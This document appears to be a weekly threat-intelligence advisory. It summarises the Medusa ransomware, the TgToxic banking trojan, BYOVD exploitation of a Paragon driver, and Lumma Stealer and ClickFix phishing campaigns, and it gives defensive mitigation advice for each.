Medusa Ransomware Claims 40+ Victims in 2025, Demands Ransoms Up to $15Mn

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include the Medusa ransomware surge, which has impacted 400 victims, including 40 in early 2025, through double extortion tactics and the exploitation of Microsoft Exchange Server vulnerabilities. Additionally, researchers uncovered TgToxic, an Android banking trojan that has expanded across Asia and Europe, adopting anti-detection features like emulator detection, domain generation algorithms (DGA), and community forum-based command-and-control (C2) methods. Meanwhile, Microsoft disclosed five critical vulnerabilities in the Paragon Partition Manager BioNTdrv.sys driver, with CVE-2025-0289 actively exploited in Bring Your Own Vulnerable Driver (BYOVD) attacks to bypass Windows security and deploy ransomware. Researchers also discovered a phishing campaign using fake CAPTCHA PDFs hosted on Webflow’s CDN, distributing Lumma Stealer malware to 1,150 organizations through SEO poisoning and malicious downloads. Lastly, a ClickFix phishing campaign is using fake OneDrive error messages to trick users into executing PowerShell scripts, injecting the Havok post-exploitation framework for remote access and lateral movement. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Medusa Ransomware Claims 40+ Victims in 2025, Demands Ransoms Up to $15Mn

Medusa ransomware, has increased its attacks by 42% from 2023 to 2024, targeting nearly 400 victims overall, with 40 new victims in early 2025 alone. The group employs double extortion tactics, exfiltrating data before encrypting systems and demanding ransoms between $100,000 and $15 million. They exploit known vulnerabilities, particularly in Microsoft Exchange Server, and often rely on initial access brokers to breach networks. Once inside, they use remote management tools like SimpleHelp, AnyDesk, and MeshAgent for persistence. They also employ Bring Your Own Vulnerable Driver (BYOVD) techniques to bypass security defenses and deploy PDQ Deploy for lateral movement, while RoboCopy and Rclone facilitate data exfiltration.

To mitigate these threats, organizations should patch public-facing vulnerabilities, restrict unauthorized RMM tools, and implement endpoint protection to detect BYOVD attacks. Monitoring for unusual use of PDQ Deploy, Rclone, and RoboCopy is crucial. Enforcing MFA, strengthening access controls, conducting regular threat-hunting, and maintaining offline backups can further reduce risks.

2. Banking Trojan Threat Grows: TgToxic Adopts Advanced Anti-Detection Features

TgToxic (aka ToxicPanda) is a rapidly evolving Android banking trojan targeting users in Asia and Europe. Since its discovery in 2023, it has expanded from Taiwan, Thailand, and Indonesia to Italy, Portugal, Hong Kong, Spain, and Peru. The malware is distributed via dropper APKs, likely through phishing or SMS campaigns, and continuously enhances its stealth and persistence capabilities.

Recent upgrades include improved emulator detection, a shift to using community forums for command-and-control (C2) communication, and the adoption of a domain generation algorithm (DGA) to evade takedowns. The malware can steal credentials, hijack user interfaces, and execute fraudulent transactions while remaining undetected.

To protect against TgToxic, individuals should avoid installing APKs from untrusted sources, enable Google Play Protect, use MFA, and monitor financial accounts. Organizations should implement mobile threat detection (MTD), enforce app restrictions via MDM, monitor for suspicious traffic, track DGA-generated domains, and conduct regular security awareness training.

3. BYOVD Attacks: Exploits Paragon Partition Manager to Bypass Windows Security

Microsoft has identified five critical vulnerabilities in the Paragon Partition Manager BioNTdrv.sys driver, with CVE-2025-0289 actively exploited in zero-day BYOVD (Bring Your Own Vulnerable Driver) attacks. These flaws allow attackers to gain SYSTEM privileges, execute arbitrary code, and cause denial-of-service (DoS) attacks. Even systems without Paragon Partition Manager installed are at risk, as the BYOVD technique enables attackers to load the vulnerable driver independently.

Threat actors drop and load the vulnerable driver, exploiting Microsoft-signed certificates to bypass security controls and deploy ransomware. The kernel-level access allows privilege escalation, security bypassing, and system crashes.

To mitigate risks, update Paragon Partition Manager, enable Windows Vulnerable Driver Blocklist, restrict unauthorized driver installations, and implement Endpoint Detection & Response (EDR) solutions. Monitoring security logs, blocking malicious driver hashes, and applying Zero Trust policies can further prevent exploitation. Microsoft has patched these flaws, reinforcing security against BYOVD threats.

4. Phishing Campaign Uses Fake CAPTCHAs in PDFs to Distribute Malware

Cybersecurity researchers have uncovered a large-scale phishing campaign using fake CAPTCHA images in PDFs hosted on Webflow’s CDN to distribute Lumma Stealer malware. Attackers leverage SEO techniques to lure victims—primarily in North America, Asia, and Southern Europe—to malicious sites that execute PowerShell commands. Over 1,150 organizations and 7,000 individuals have been affected, particularly in the technology, financial, and manufacturing sectors.

The campaign involves malicious PDFs uploaded to sites like PDFCOFFEE and Internet Archive to maximize reach. Once opened, the PDFs steal credentials or execute MSHTA commands to install Lumma Stealer, a malware-as-a-service (MaaS) tool used for data theft. Additionally, attackers distribute it via fake Roblox games and cracked software. Stolen data is later shared for free on hacking forums.

To mitigate risks, avoid downloading PDFs from untrusted sources, verify CAPTCHA prompts before interacting, restrict PowerShell execution, and implement endpoint protection. Regular phishing awareness training, monitoring for stolen credentials, and enhancing browser security can further reduce exposure.

5. ClickFix Phishing Campaign Deploys Havok Framework via Fake OneDrive Errors

A new ClickFix phishing campaign tricks victims into executing malicious PowerShell commands, deploying the Havok post-exploitation framework for remote access. Attackers disguise malware as a OneDrive error fix, leveraging Microsoft SharePoint and Graph API to evade detection. The campaign enables adversaries to maintain persistence and move laterally across corporate networks.

Victims receive phishing emails containing a malicious HTML attachment that mimics a 0x8004de86 OneDrive error message. Clicking the “How to Fix” button copies a PowerShell command, tricking users into executing it manually. If run, the script modifies the Windows Registry, installs Python, and injects the Havok framework as a DLL, granting attackers persistent access.

To mitigate risks, organizations should block untrusted PowerShell execution, train employees to identify phishing tactics, and monitor Microsoft Graph API traffic. Restrict unauthorized software installations, disable macros, use behavioral analytics for anomaly detection, and implement advanced email filtering to prevent similar attacks.